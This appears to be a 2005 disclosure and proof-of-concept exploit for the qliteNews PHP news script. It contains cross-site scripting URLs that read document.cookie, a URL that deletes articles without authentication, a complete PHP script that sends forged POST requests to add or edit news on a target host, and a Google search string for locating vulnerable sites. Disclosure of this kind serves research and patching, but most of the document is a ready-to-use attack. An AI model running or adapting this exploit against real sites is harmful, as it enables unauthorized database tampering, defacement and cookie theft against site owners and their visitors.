29/07/2005 23.25.51

qliteNews arbitrary database manipulation & cross site scripting poc exploit

software:
author site:
http://www.r2xdesign.net/page-phpscripts.php

xss:
http://[target]/[path]/admin/modifynews.php?id="><script>alert(document.cookie)</script>
http://[target]/[path]/admin/newsprocess.php?action=<script>alert(document.cookie)</script>

a user can access directly to /admin/newsprocess.php script to delete news from the database:
http://[target]/[path]/admin/newsprocess.php?action=del&id=1

$id var is for article number, so you delete the first news article of the site

also you can POST request to submit news or edit news:
this is my exploit code to submit news:

<?php

//***  http://www.rgod.altervista.org
//make these changes in php.ini if you have troubles
//with this script
//
//allow_call_time_pass_reference = on
//register_globals = On



error_reporting(0);
echo '<head><title>qlite news arbitrary database manipulation poc exploit</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
      <style type="text/css">
      <!--
      body,td,th {color: #00FF00;}
      body {background-color: #000000;}
      .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
      .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
	       font-weight: bold;
	       font-style: italic;
              }
      -->
      </style></head>
      <body>
<p class="Stile6">qlite news arbitrary database manipulation poc exploit</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<table width="84%" >
  <tr>
    <td width="43%">
     <form name="form1" method="post" action="'.$PHP_SELF.'?mypath=value&host=value&port=value&author=value&title=value&news=value&id=value">
      <p>
       <input type="text" name="host">
      <span class="Stile5">hostname (ex: www.sitename.com) </span></p>
      <p>
        <input type="text" name="mypath">
        <span class="Stile5">path (ex: /qlite/admin/ or /admin/ or just /) </span></p>
      <p>
      <input type="text" name="port">
        <span class="Stile5">specify a port other than 80 (default value) </span></p>
      <p>
      <input type="text" name="author">
        <span class="Stile5">author</span></p>
      <p>
      <input type="text" name="title">
        <span class="Stile5">title</span></p>
      <p>
      <input type="text" name="news">
        <span class="Stile5">news</span></p>
      <p>
      <input type="text" name="id">
        <span class="Stile5">article id (a number...)</span></p>
      <p>
          <input type="submit" name="Submit" value="go!">
      </p>
    </form></td>
  </tr>
</table>
</body>
</html>';

echo $mypath.'<br>';
echo $host.'<br>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
			    }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
			    }

echo "</tr></table>";
}

echo $port.'<br>';

if (($mypath<>'') and ($host<>''))
{
if ($port=='') {$port=80;}

$data="author=".urlencode($author)."&title=".urlencode($title)."&news=".urlencode($news)."&date=now&ip=kiss+me";
$data.="&id=".$id."&action=post&submit_news=1\r\n\r\n";

$packet ="POST ".$mypath."newsprocess.php HTTP/1.1\r\n";
$packet.="Accept: */*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: LOLLLLLL!\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;


echo '<br> Sending exploit to '.$host.'<br>';
show($packet);
$fp=fsockopen(gethostbyname($host),$port);
fputs($fp,$packet);  
$data='';
while (!feof($fp))
{
$data.=fgets($fp);
}
fclose($fp);
if (eregi('HTTP/1.1 200 OK',$data))
    {echo 'Exploit sent...<br> if qlite is unpatched and vulnerable <br>';
     echo 'you will see a new news article ;) ...';
    }
else
    {echo 'Error, see packet dump...';}
show($data);
}

?>

googledork: "Powered by qliteNews" 

rgod
email: retrogod at aliceposta.it
site: http://rgod.altervista.org